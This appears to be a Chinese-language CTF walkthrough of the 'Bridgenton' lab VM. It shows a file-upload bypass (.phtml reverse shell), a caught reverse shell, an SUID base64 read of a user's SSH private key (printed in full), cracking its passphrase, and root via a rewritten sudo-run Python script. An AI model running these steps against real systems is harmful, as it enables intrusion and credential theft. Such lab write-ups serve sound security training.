TheHackersLabs-Bridgenton靶机详解WP

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for ctf:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.137  08:00:27:c0:90:1b       (Unknown)
192.168.60.254  00:50:56:fd:82:05       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.929 seconds (132.71 hosts/sec). 4 responded
❯ export ip=192.168.60.137
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.137:22
Open 192.168.60.137:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-04 19:40 CST
Initiating ARP Ping Scan at 19:40
Scanning 192.168.60.137 [1 port]
Completed ARP Ping Scan at 19:40, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:40
Completed Parallel DNS resolution of 1 host. at 19:40, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:40
Scanning 192.168.60.137 [2 ports]
Discovered open port 22/tcp on 192.168.60.137
Discovered open port 80/tcp on 192.168.60.137
Completed SYN Stealth Scan at 19:40, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.137
Host is up, received arp-response (0.00061s latency).
Scanned at 2025-01-04 19:40:24 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:C0:90:1B (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

文件上传

有个80端口，访问发现可以进行注册

我尝试上传一个图片马的时候，不给上传

当我上传一个正常符合后缀要求的图片也不能上传⁉️

我把php反弹shell上传改成phtml竟然可以成功

扫了一下目录

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.137
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 318] [--> http://192.168.60.137/uploads/]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.60.137/javascript/]
/server-status        (Status: 403) [Size: 279]
Progress: 207643 / 207644 (100.00%)
===============================================================

用户提权

访问uploads目录，即可反弹shell

❯ pwncat-cs -lp 4444
[20:03:56] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
[20:03:57] received connection from 192.168.60.137:36494                                                                                    bind.py:84
[20:03:57] 0.0.0.0:4444: upgrading from /usr/bin/dash to /usr/bin/bash                                                                  manager.py:957
[20:03:58] 192.168.60.137:36494: registered new host w/ db                                                                              manager.py:957
(local) pwncat$
(remote) www-data@Bridgenton:/$ 

在webshell中再次信息收集

发现对base64拥有suid权限

(remote) www-data@Bridgenton:/$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/base64
/usr/bin/mount
/usr/bin/su
/usr/bin/umount
/usr/bin/chsh
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign

尝试读取私钥文件

(remote) www-data@Bridgenton:/$ base64 /home/james/.ssh/id_rsa|base64 -d
-----BEGIN OPENSSH PRIVATE KEY-----
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
miPO9cjj/N5uge70CWOIqG2YbP4=
-----END OPENSSH PRIVATE KEY-----

爆破一下私钥，这个密码好像之前做其他靶机的时候有碰到过🤣

❯ vim id_rsa
❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
bowwow           (id_rsa)
1g 0:00:00:07 DONE (2025-01-04 20:14) 0.1351g/s 43.24p/s 43.24c/s 43.24C/s adidas..101010
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Root提权

ssh连一下，发现有sudo权限

❯ ssh [email protected] -i id_rsa
[email protected]'s password:
Linux Bridgenton 6.1.0-18-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.76-1 (2024-02-01) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Apr  2 10:32:50 2024 from 192.168.1.41
james@Bridgenton:~$ cat user.txt
8e18fa38b2b24be6999bf8bf00a47cb5
james@Bridgenton:~$ sudo -l
Matching Defaults entries for james on Bridgenton:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User james may run the following commands on Bridgenton:
    (root) NOPASSWD: /usr/bin/python3 /opt/example.py

但是这个文件我们不能写，不过opt文件夹我们可写

直接删文件重新touch

james@Bridgenton:~$ ls -al /opt/example.py
-rw-r--r-- 1 root root 132 abr  1  2024 /opt/example.py
james@Bridgenton:~$ ls -al /
total 68
drwxr-xr-x  18 root  root  4096 mar 29  2024 .
drwxr-xr-x  18 root  root  4096 mar 29  2024 ..
lrwxrwxrwx   1 root  root     7 mar 29  2024 bin -> usr/bin
drwxr-xr-x   3 root  root  4096 mar 29  2024 boot
drwxr-xr-x  17 root  root  3320 ene  4 12:39 dev
drwxr-xr-x  72 root  root  4096 ene  4 13:07 etc
drwxr-xr-x   3 root  root  4096 mar 29  2024 home
lrwxrwxrwx   1 root  root    30 mar 29  2024 initrd.img -> boot/initrd.img-6.1.0-18-amd64
lrwxrwxrwx   1 root  root    30 mar 29  2024 initrd.img.old -> boot/initrd.img-6.1.0-18-amd64
lrwxrwxrwx   1 root  root     7 mar 29  2024 lib -> usr/lib
lrwxrwxrwx   1 root  root     9 mar 29  2024 lib64 -> usr/lib64
drwx------   2 root  root 16384 mar 29  2024 lost+found
drwxr-xr-x   3 root  root  4096 mar 29  2024 media
drwxr-xr-x   2 root  root  4096 mar 29  2024 mnt
drwxr-xr-x   2 james root  4096 abr  1  2024 opt
dr-xr-xr-x 146 root  root     0 ene  4 12:39 proc
drwx------   4 root  root  4096 abr  2  2024 root
drwxr-xr-x  19 root  root   560 ene  4 13:15 run
lrwxrwxrwx   1 root  root     8 mar 29  2024 sbin -> usr/sbin
drwxr-xr-x   2 root  root  4096 mar 29  2024 srv
dr-xr-xr-x  13 root  root     0 ene  4 12:39 sys
drwxrwxrwt   8 root  root  4096 ene  4 13:09 tmp
drwxr-xr-x  12 root  root  4096 mar 29  2024 usr
drwxr-xr-x  12 root  root  4096 mar 29  2024 var
lrwxrwxrwx   1 root  root    27 mar 29  2024 vmlinuz -> boot/vmlinuz-6.1.0-18-amd64
lrwxrwxrwx   1 root  root    27 mar 29  2024 vmlinuz.old -> boot/vmlinuz-6.1.0-18-amd64

写一个新的example.py

james@Bridgenton:~$ rm /opt/example.py
rm: ¿borrar el fichero regular '/opt/example.py'  protegido contra escritura? (s/n) y
james@Bridgenton:~$ vi /opt/example.py
import os; os.system("/bin/sh")
james@Bridgenton:/opt$ sudo  /usr/bin/python3 /opt/example.py
# id
uid=0(root) gid=0(root) grupos=0(root)
# cat /root/root.txt
73f441f6bf5ed73b61dc53d317d51478